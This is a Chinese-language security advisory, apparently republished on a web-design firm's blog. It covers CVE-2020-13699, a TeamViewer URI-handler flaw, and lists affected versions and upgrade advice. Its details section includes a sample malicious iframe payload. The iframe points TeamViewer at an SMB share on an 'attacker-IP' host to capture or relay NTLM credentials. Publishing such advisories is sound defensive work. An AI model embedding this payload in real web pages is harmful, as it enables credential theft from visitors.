怎么解析TeamViewer用戶密碼破解漏洞

本篇文章給大家分享的是有關(guān)怎么解析TeamViewer 用戶密碼破解漏洞,小編覺得挺實用的,因此分享給大家學(xué)習(xí),希望大家閱讀完這篇文章后可以有所收獲,話不多說,跟著小編一起來看看吧。

我們提供的服務(wù)有:成都網(wǎng)站制作、做網(wǎng)站、外貿(mào)營銷網(wǎng)站建設(shè)、微信公眾號開發(fā)、網(wǎng)站優(yōu)化、網(wǎng)站認證、海港ssl等。為1000+企事業(yè)單位解決了網(wǎng)站和推廣的問題。提供周到的售前咨詢和貼心的售后服務(wù),是有科學(xué)管理、有技術(shù)的海港網(wǎng)站制作公司

0x01 漏洞簡述

2020年08月10日,360CERT監(jiān)測發(fā)現(xiàn)TeamViewer官方發(fā)布了TeamViewerURL處理的風(fēng)險通告,該漏洞編號為CVE-2020-13699,漏洞等級:高危,漏洞評分:8.8分。
TeamViewer存在未引用的搜索路徑或元素的安全缺陷,更具體地說,這是由于應(yīng)用程序沒有正確引用它的自定義URI處理程序,當(dāng)安裝了TeamViewer的易受攻擊版本的用戶訪問惡意創(chuàng)建的網(wǎng)站時,可能會被黑客利用。

對此,360CERT建議廣大用戶及時將TeamViewer升級到15.8.3版本。與此同時,請做好資產(chǎn)自查以及預(yù)防工作,以免遭受黑客攻擊。

0x02 風(fēng)險等級

360CERT對該漏洞的評定結(jié)果如下

評定方式等級
威脅等級高危
影響面廣泛
360CERT評分8.8分

0x03 漏洞詳情

TeamViewer主要用于遠程訪問和控制各種類型的計算機系統(tǒng)和移動設(shè)備,但也提供協(xié)作和演示功能(例如,桌面共享、網(wǎng)絡(luò)會議、文件傳輸?shù)?。

TeamViewer存在未引用的搜索路徑或元素的安全缺陷,更具體地說,這是由于應(yīng)用程序沒有正確引用它的自定義URI處理程序,當(dāng)安裝了TeamViewer的易受攻擊版本的系統(tǒng)訪問惡意創(chuàng)建的網(wǎng)站時,可能會被利用,攻擊者可以使用精心制作的URL(iframesrc='teamviewer10:--play\\attacker-IP\share\fake.tvs')將惡意iframe嵌入網(wǎng)站中,這將啟動TeamViewerWindows桌面客戶端并強制其執(zhí)行以下操作:打開遠程SMB共享。Windows在打開SMB共享時將執(zhí)行NTLM身份驗證,并且可以將請求進行轉(zhuǎn)發(fā)(使用諸如響應(yīng)程序之類的工具)以執(zhí)行代碼(或捕獲以進行哈希破解)。

0x04 影響版本

TeamViewer<8.0.258861
TeamViewer<9.0.28860
TeamViewer<10.0.258873
TeamViewer<11.0.258870
TeamViewer<12.0.258869
TeamViewer<13.2.36220
TeamViewer<14.2.56676
TeamViewer<15.8.3

0x05 修復(fù)建議

通用修補建議:

升級到15.8.3版本,下載地址為:

Previous TeamViewer versions 10 – 11 – 12 – 13 – 14

https://www.teamviewer.com/en/download/previous-versions/

0x06 相關(guān)空間測繪數(shù)據(jù)

360安全大腦-Quake網(wǎng)絡(luò)空間測繪系統(tǒng)通過對全網(wǎng)資產(chǎn)測繪,發(fā)現(xiàn)TeamViewer全球均有廣泛使用,具體分布如下圖所示。

怎么解析TeamViewer 用戶密碼破解漏洞

0x07 產(chǎn)品側(cè)解決方案

360城市級網(wǎng)絡(luò)安全監(jiān)測服務(wù)

360安全大腦的QUAKE資產(chǎn)測繪平臺通過資產(chǎn)測繪技術(shù)手段,對該類漏洞進行監(jiān)測,請用戶聯(lián)系相關(guān)產(chǎn)品區(qū)域負責(zé)人或(quake##)獲取對應(yīng)產(chǎn)品。

以上就是怎么解析TeamViewer 用戶密碼破解漏洞,小編相信有部分知識點可能是我們?nèi)粘9ぷ鲿姷交蛴玫降?。希望你能通過這篇文章學(xué)到更多知識。更多詳情敬請關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道。

文章名稱:怎么解析TeamViewer用戶密碼破解漏洞
當(dāng)前地址:http://muchs.cn/article12/jepsdc.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供外貿(mào)建站、品牌網(wǎng)站設(shè)計、做網(wǎng)站、手機網(wǎng)站建設(shè)域名注冊、商城網(wǎng)站

廣告

聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請盡快告知,我們將會在第一時間刪除。文章觀點不代表本網(wǎng)站立場,如需處理請聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時需注明來源: 創(chuàng)新互聯(lián)

搜索引擎優(yōu)化